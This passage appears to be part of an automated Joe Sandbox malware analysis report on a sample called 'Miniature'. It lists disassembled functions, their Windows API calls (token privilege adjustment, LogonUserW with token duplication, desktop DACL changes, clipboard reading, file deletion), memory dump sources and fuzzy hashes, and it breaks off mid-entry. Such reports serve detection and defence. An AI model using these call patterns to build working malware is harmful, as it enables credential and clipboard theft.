                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 5cf97282f6775afe0871b074c6a73a7c112e58c907e13c5f1b9bef8efb079a33
                                                                                                                                                                                                                                                                                            • Instruction ID: 3375de2b757a83d6b7eef9ef2a8a0dd574be9ed7dc0ecdca82f1d0d7c9615f0e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cf97282f6775afe0871b074c6a73a7c112e58c907e13c5f1b9bef8efb079a33
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30F015B5105752CFCB349F65D8A0896BBE4AF1632A324897EE6E786610CB319884EF50
                                                                                                                                                                                                                                                                                            Function 00C66AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5bc4adec7ec334e57486dbc12f6e974a56bc6e30892aa8e9a2786c13ba183fee
                                                                                                                                                                                                                                                                                            • Instruction ID: 4bcfc792d275fb5d744ec4760b561dc2ef09285b5c17e3a5e639270ff2574e6a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bc4adec7ec334e57486dbc12f6e974a56bc6e30892aa8e9a2786c13ba183fee
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66F02B71704200AAD7309FB5E8457B9F7E8BB11314F14461ED8E5C3281C7F254D4A761
                                                                                                                                                                                                                                                                                            Function 00C1684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                            • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                            • Instruction ID: 4346cc9d18b9c2b142782d4ad086f58ee7eff0e7bdb418d64bf02d65c22b86e8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68F0F87551020DFFDF05DF90C941E9EBB79FB08318F208445F9159A151C336EA61EBA1
                                                                                                                                                                                                                                                                                            Function 00C13907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00C13963
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 23be989ff199d5b69918320283d0baa846730bc2f292b8969f3a2e54bb7e44a1
                                                                                                                                                                                                                                                                                            • Instruction ID: 53abaa5fbb4d06cbbf8164ac6fa269e55c00bdb5774944f7f5344d794a0c84e8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23be989ff199d5b69918320283d0baa846730bc2f292b8969f3a2e54bb7e44a1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8F037709143589FEB52DF24DC46BD97BBCA70570CF0000A5A6859B191D7745788CF51
                                                                                                                                                                                                                                                                                            Function 00C13A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00C13A76
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 541455249-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 26093e9d48ed03f500865d470575598a5d32f61a9e39e60a4c0875eef36b7b99
                                                                                                                                                                                                                                                                                            • Instruction ID: 4e7b291752942beb6661a7e077802b6b17ce70dd3a995fcfe50dda659522c424
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26093e9d48ed03f500865d470575598a5d32f61a9e39e60a4c0875eef36b7b99
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6E0C276A002245BCB20E2589C06FEE77EDDFC97A0F4441B1FC0AD7258D960EDC4E690
                                                                                                                                                                                                                                                                                            Function 00C5071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000000,?,00C50A84,?,?,00000000,?,00C50A84,00000000,0000000C), ref: 00C50737
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c22fa6c035fc74c0553305f16d1e88c174a45b9222ef65a381d1555aa7f87b64
                                                                                                                                                                                                                                                                                            • Instruction ID: 71e232ff4f80f4e6904cace0f2702078d27898d19061c9dfe2721c345461a648
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c22fa6c035fc74c0553305f16d1e88c174a45b9222ef65a381d1555aa7f87b64
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27D06C3210010DBBDF028F84DD06EDE3BAAFB48714F014000BE5956020C736E821AB90
                                                                                                                                                                                                                                                                                            Function 00C7EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,00C7D840), ref: 00C7EAB1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 962b1aab4620428568fa3f690520c516387520d6f2611eb2b8625d0c5f7f7a69
                                                                                                                                                                                                                                                                                            • Instruction ID: 728b03757effa6aad5d900678a108a82bb47212033bc0d6aa7dd5c9ca0872238
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 962b1aab4620428568fa3f690520c516387520d6f2611eb2b8625d0c5f7f7a69
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CB0922580060005AD280A385A09B993B007847BB97DC5BC0E47F864F1C3398D0FF950
                                                                                                                                                                                                                                                                                            Function 00C8664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7DC54: FindFirstFileW.KERNEL32(?,?), ref: 00C7DCCB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00C7DD1B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C7DD2C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7DC54: FindClose.KERNEL32(00000000), ref: 00C7DD43
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C8666E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b80bf4b51f5297fd0b08cf35092294348dab793babffc4e518137edf530f95f2
                                                                                                                                                                                                                                                                                            • Instruction ID: 8b8bf264ca8557043d0f7036217ea446b9a16c1774b9c5f3abd43834f4363d39
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b80bf4b51f5297fd0b08cf35092294348dab793babffc4e518137edf530f95f2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECF0A0362042148FCB10EF58D845BAEBBE5AF89320F048409F90A8B362CB74BC41EB94

                                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                                            Function 00C71B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C72010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7205A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C72010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C72087
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C72010: GetLastError.KERNEL32 ref: 00C72097
                                                                                                                                                                                                                                                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00C71BD2
                                                                                                                                                                                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00C71BF4
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C71C05
                                                                                                                                                                                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C71C1D
                                                                                                                                                                                                                                                                                            • GetProcessWindowStation.USER32 ref: 00C71C36
                                                                                                                                                                                                                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 00C71C40
                                                                                                                                                                                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C71C5C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C71B48), ref: 00C71A20
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A0B: CloseHandle.KERNEL32(?,?,00C71B48), ref: 00C71A35
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                                            • String ID: $default$winsta0
                                                                                                                                                                                                                                                                                            • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                                            • Opcode ID: 3e4d47414b899e96e2abb5e1fd92b94b1f525117e57613e42bb2f090abd8ada7
                                                                                                                                                                                                                                                                                            • Instruction ID: 08e7134197c0af5f07bde7e2c64fdd41c333cb569fbbf1942cee9e9e43bfb90f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e4d47414b899e96e2abb5e1fd92b94b1f525117e57613e42bb2f090abd8ada7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6815E71900209AFDF219FA8DC49FEE7BB8EF05704F188059FD1AA61A0D7718A55DF60
                                                                                                                                                                                                                                                                                            Function 00C714AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C71A60
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A6C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A7B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A82
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C71A99
                                                                                                                                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C71518
                                                                                                                                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C7154C
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00C71563
                                                                                                                                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00C7159D
                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C715B9
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00C715D0
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C715D8
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C715DF
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C71600
                                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00C71607
                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C71636
                                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C71658
                                                                                                                                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C7166A
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C71691
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C71698
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C716A1
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C716A8
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C716B1
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C716B8
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C716C4
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C716CB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71ADF: GetProcessHeap.KERNEL32(00000008,00C714FD,?,00000000,?,00C714FD,?), ref: 00C71AED
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C714FD,?), ref: 00C71AF4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C714FD,?), ref: 00C71B03
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 00986941e1ced0c48aa57f8532cd847fca7af995a182bdb99d0654a015b860d9
                                                                                                                                                                                                                                                                                            • Instruction ID: 8003d85fa00772d5b0717852884add12a283e76073e9716b2b0545b86058e532
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00986941e1ced0c48aa57f8532cd847fca7af995a182bdb99d0654a015b860d9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24713CB2900209ABDF109FA9DC44FEEBBB8FF05754F188515F92AA7190D771DA05CBA0
                                                                                                                                                                                                                                                                                            Function 00C8F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • OpenClipboard.USER32(00CADCD0), ref: 00C8F586
                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C8F594
                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00C8F5A0
                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00C8F5AC
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C8F5E4
                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00C8F5EE
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C8F619
                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00C8F626
                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 00C8F62E
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C8F63F
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C8F67F
                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 00C8F695
                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000F), ref: 00C8F6A1
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C8F6B2
                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00C8F6D4
                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C8F6F1
                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C8F72F
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C8F750
                                                                                                                                                                                                                                                                                            • CountClipboardFormats.USER32 ref: 00C8F771
                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00C8F7B6
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                            • String ID:
